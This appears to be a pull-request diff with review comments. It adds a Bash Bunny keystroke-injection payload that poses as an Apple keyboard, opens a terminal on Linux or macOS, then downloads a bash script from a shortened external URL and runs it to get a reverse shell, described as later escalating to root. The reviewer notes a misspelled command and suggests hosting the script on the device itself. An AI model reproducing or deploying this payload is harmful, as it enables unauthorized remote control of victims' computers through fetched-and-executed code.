payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt

```diff
@@ -0,0 +1,48 @@
+# Title:         Linux/Mac Reverse Shell
+# Author:        Darkprince(Sridhar)
+# Version:       1.0
+#
+# Runs a script in the background that gives a user shell initially and waits for user to
+# escalate privileges and give a root reverse shell
+#
+# Magenta..................Setup
+# Red,Green,Blue......Executing
+# Green....................Finished
+
+
+# INITIALIZING
+LED M
+# Mac keyboard works in linux and mac
+ATTACKMODE  HID VID_0X05AC PID_0X021E
+
+LANGUAGE='us'
+
+# ATTACKING
+LED R G B
+
+# Get linux,mac Termial
+RUN UNITY xterm
+Q DELAY 1000
+# To close opened window by linux run command
+Q GUI Q
+Q CTRL C
+RUN OSX terminal
+Q DELAY 1000
+
+# If linux then clearing 'terminal' which is typed by mac run script
+Q CTRL C
+
+# Downloading bash script from server and Executing bash script which is same for mac and linux
+Q SRTING curl -L http://bit.do/bunnybash -o payload.sh && bash payload.sh && rm payload.sh
```

Comment:
Please consider using the Bash Bunny to host the file with an ECM_ETHERNET attack mode. With this method, the file may be hosted with an internal web server. You may also use mass storage to get the file onto the target. Also, STRING is misspelled.

Reply:
Yeah i have updated the payload delivery method.